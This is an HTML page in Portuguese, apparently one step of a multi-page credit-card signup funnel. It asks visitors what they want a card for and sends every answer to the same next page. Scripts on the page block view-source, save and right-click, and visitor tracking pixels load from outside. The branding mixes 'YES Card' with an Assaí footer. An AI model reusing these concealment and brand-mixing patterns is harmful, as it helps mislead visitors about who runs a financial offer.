<!DOCTYPE html>
<html lang="pt-BR">

<head>
    <script src="js/latest.js" data-utmify-prevent-subids="" async="" defer=""></script>
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Interesse com Cartão de Crédito</title>
    <link href="5/css/bootstrap.min.css" rel="stylesheet">
    <link href="../../css2-2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
    <style>
        :root {
            --primary-color: #000000;
            --primary-light: rgba(0, 0, 0, 0.1);
        }

        body {
            font-family: 'Poppins', sans-serif;
            background-color: #f9f9f9;
            color: #333;
            margin: 0;
            padding: 0;
            display: flex;
            flex-direction: column;
            min-height: 100vh;
        }

        .header {
            background-color: #1E3A80;
            padding: 20px 0;
            text-align: center;
            border-bottom: 3px solid #ee4d2d;
        }

        .header img {
            width: 150px;
        }

        .main-content {
            max-width: 500px;
            background: #fff;
            margin: 30px auto;
            padding: 30px;
            border-radius: 10px;
            box-shadow: 0 4px 15px rgba(0, 0, 0, 0.1);
        }

        .btn-simple {
            width: 100%;
            margin-bottom: 10px;
            padding: 12px;
            background: #1E3A80;
            border: none;
            border-radius: 8px;
            font-weight: bold;
            color: white;
            text-align: center;
            cursor: pointer;
            transition: transform 0.3s ease, box-shadow 0.3s ease;
        }

        .btn-simple:hover {
            transform: scale(1.05);
            box-shadow: 0 8px 20px rgba(0, 0, 0, 0.2);
        }

        .footer {
            background: #ffffff;
            border-top: 1px solid #e6e6e6;
            text-align: center;
            padding: 15px;
            font-size: 10px;
            color: #666;
            margin-top: auto;
        }
    </style>
    <script>
        if (document.addEventListener) {
            document.addEventListener("keydown", bloquearSource);
        } else { //Versões antigas do IE
            document.attachEvent("onkeydown", bloquearSource);
        }

        function bloquearSource(e) {
            e = e || window.event;

            var code = e.which || e.keyCode;

            if (
                e.ctrlKey &&
                (code == 83 || code == 85) //83 = S, 85 = U
            ) {
                if (e.preventDefault) {
                    e.preventDefault();
                } else {
                    e.returnValue = false;
                }

                return false;
            }
        }
    </script>
    <style>
        /*desabilita a seleção no body*/
        body {
            -webkit-touch-callout: none;
            /* iOS Safari */
            -webkit-user-select: none;
            /* Chrome/Safari/Opera */
            -khtml-user-select: none;
            /* Konqueror */
            -moz-user-select: none;
            /* Firefox */
            -ms-user-select: none;
            /* Internet Explorer/Edge */
            user-select: none;
        }

        /*habilita a seleção nos campos editaveis*/
        input,
        textarea {
            -webkit-touch-callout: initial;
            /* iOS Safari */
            -webkit-user-select: text;
            /* Chrome/Safari/Opera */
            -khtml-user-select: text;
            /* Konqueror */
            -moz-user-select: text;
            /* Firefox */
            -ms-user-select: text;
            /* Internet Explorer/Edge */
            user-select: text;
        }

        /*habilita a seleção nos campos com o atributo contenteditable*/
        [contenteditable=true] {
            -webkit-touch-callout: initial;
            /* iOS Safari */
            -webkit-user-select: all;
            /* Chrome/Safari/Opera */
            -khtml-user-select: all;
            /* Konqueror */
            -moz-user-select: all;
            /* Firefox */
            -ms-user-select: all;
            /* Internet Explorer/Edge */
            user-select: all;
        }
    </style>

    <script>
        if (document.addEventListener) {
            document.addEventListener("contextmenu", function (e) {
                e.preventDefault();
                return false;
            });
        } else { //Versões antigas do IE
            document.attachEvent("oncontextmenu", function (e) {
                e = e || window.event;
                e.returnValue = false;
                return false;
            });
        }
    </script>
<script>
  window.pixelId = "68cb78856141a2ab904ccacf";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  async
  defer
></script>
</head>

<body>
    <!-- Header -->
    <div class="header">
        <img decoding="async" style="width: 120px;" src="5/images/logo.svg" alt="YES Card">
    </div>

    <!-- Main Content -->
    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 18px;" class="main-content">
            <div id="InteresseCard" class="mb-3">
                <p><strong style="font-size: 18px;">Qual e o seu interesse com um Cartao de Credito hoje?</strong></p>
                <button class="btn-simple" onclick="redirecionarUtmsPage6()">Fazer uma compra específica</button>
                <button class="btn-simple" onclick="redirecionarUtmsPage6()">Fazer uma viagem</button>
                <button class="btn-simple" onclick="redirecionarUtmsPage6()">Poder gastar mais</button>
                <button class="btn-simple" onclick="redirecionarUtmsPage6()">Organizar a minha vida financeira</button>
                <button class="btn-simple" onclick="redirecionarUtmsPage6()">Outros</button>
            </div>
        </div>
    </div>

    <script>
        function redirecionarUtmsPage6() {
            window.location.href = '/6' + window.location.search;
        }
    </script>

    <!-- Footer -->
    <div class="footer">
        Copyright © 2025 Assaí. Todos os direitos reservados.<br>

        Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>




</body>

</html>
